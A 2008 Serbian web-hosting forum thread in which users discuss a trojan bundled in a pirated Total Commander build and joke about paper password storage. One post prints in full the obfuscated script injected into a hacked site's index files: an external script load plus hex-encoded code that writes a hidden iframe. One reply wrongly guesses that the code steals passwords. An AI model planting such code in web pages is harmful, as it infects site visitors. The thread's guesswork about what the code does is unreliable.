Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima |
|
Alati teme | Način prikaza |
09. 04. 2008. | #11 |
expert
Expert
Datum učlanjenja: 27.11.2005
Poruke: 543
Hvala: 47
57 "Hvala" u 31 poruka
|
Uz Total Commander Ultima Prime dolazi fajl koji se lepo zove
Kôd:
DCE Generic clean: {PE_Generic, C:\Program Files\TC UP\PLUGINS\Tools\FtpPasswordRipper\Windows_Commander_FTP_Password_RIPPER.exe} BTW, nod32 nista ne kaze za doticni fajl, ali ga TrendMicro sysclean cisti. |
09. 04. 2008. | #12 |
I think I'm a sofa...
Professional
Datum učlanjenja: 16.11.2005
Poruke: 438
Hvala: 9
28 "Hvala" u 25 poruka
|
Bolje na onaj postIT nalepljen na monitor, kao po drzavnim sluzbama i nekim bankama... sa sve korisnickim nalozima i paswordima...
|
09. 04. 2008. | #13 |
Siva eminencija
Grand Master
|
roboform.com ... ekstra programce, nije skupo, a radi posao vrhunski.
|
09. 04. 2008. | #14 | |
expert
Expert
Datum učlanjenja: 27.11.2005
Poruke: 543
Hvala: 47
57 "Hvala" u 31 poruka
|
Identifikovan trojanac kao TROJ_BUZUS / Trojan.Buzus.
Info: Citat:
|
|
09. 04. 2008. | #15 |
Ivan Dilber
Sir Write-a-Lot
|
pa ja sljakam od kuce, tako da mu papirce dodje i najsigurnija varijanta... imam cak i psa, da brani podatke
__________________
Leadership is the art of getting people to want to do what you know must be done. |
09. 04. 2008. | #16 |
Web designer
Professional
|
Ja recimo imam odštampane sve šifre, tako da takav problem ne može da se desi
|
09. 04. 2008. | #17 |
Designer guy
Wrote a book
|
U mom slucaju (novootkriveno danas) su se sadrzaji index fajlova zamenjivali ovim kodom:
Kôd:
<script src="http://safe.google-signature.com/webanalytics.js"></script><script>function v47f5126c27ffd(v47f5126c28008){ function v47f5126c28014 () {return 16;} return(parseInt(v47f5126c28008,v47f5126c28014()));}function v47f5126c28048(v47f5126c2804e){ var v47f5126c28060=2; var v47f5126c28053='';for(v47f5126c28059=0; v47f5126c28059<v47f5126c2804e.length; v47f5126c28059+=v47f5126c28060){ v47f5126c28053+=(String.fromCharCode(v47f5126c27ffd(v47f5126c2804e.substr(v47f5126c28059, v47f5126c28060))));}return v47f5126c28053;} document.write(v47f5126c28048('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6261333537643531207372633D5C27687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313634333733292B2733663235393862315C272077696474683D353631206865696768743D323933207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> |
09. 04. 2008. | #18 |
Goran Pilipović
Sir Write-a-Lot
|
Koliko ja vidim na prvi pogled ovo preverava karaktere koje kucas na sajtu (verovatno ceka da ukucas password ) i onda salje na neki script na tom njegovom serveru koji dalje verovatno cuva koji je domen i koji je password...
a ovo function v47f5126c28014 () je "mracna fora" Ta funkcija vraca samo broj 16, koji onda sluzi za parseInt da vraca heksadecimalni broj. Stvarno ne znam zasto se toliko trudio da to zamaskira, pa umesto parseInt (broj, 16) pise parseInt(v47f5126c28008,v47f5126c28014())
__________________
Goran Pilipović a.k.a. Ugly Fingers Bradley f.k.a. bluesman I don't always know what I'm talking about but I know I'm right! |
09. 04. 2008. | #19 |
I'm a PC too.
Wrote a book
Datum učlanjenja: 05.06.2005
Lokacija: Kanada
Poruke: 1.354
Hvala: 82
130 "Hvala" u 89 poruka
|
Pa to je mnogo sigurnije nego da ih držiš u nekom fajlu - tako ipak neko mora fizički da dođe i uzme taj papir..
__________________
Commercial-Free !!! |
09. 04. 2008. | #20 |
Ivan Dilber
Sir Write-a-Lot
|
verovatno se ime te funkcije generise slucajno, pa je onda ideja da time promeni signature skripti, ako neko (web hosting admin recimo) pokusa da grepuje trazeci zarazene sajtove.. mada slazem se da je glupo
__________________
Leadership is the art of getting people to want to do what you know must be done. |
|
|
Slične teme | ||||
Tema | Početna poruka teme | Forum | Odgovori | Poslednja poruka |
301 redirkecija "dinamickog" URLa na "dinamicki" URL | mb_sa | Regular expression i htaccess | 7 | 02. 07. 2008. 19:21 |
Karakteri "&" i "=" i XMLHttpRequest | Milos Vukotic | Regular expression i htaccess | 18 | 01. 10. 2007. 15:16 |
If IT really is a "profession", what is our "pro bono" contribution as IT pros? | oksite | e-Business | 26 | 12. 01. 2007. 11:18 |
"Telekom Slovenije" preuzeo "Blic.net" za 390.000 evra | Aleksandar Marković | Komunikacije | 2 | 23. 12. 2006. 14:23 |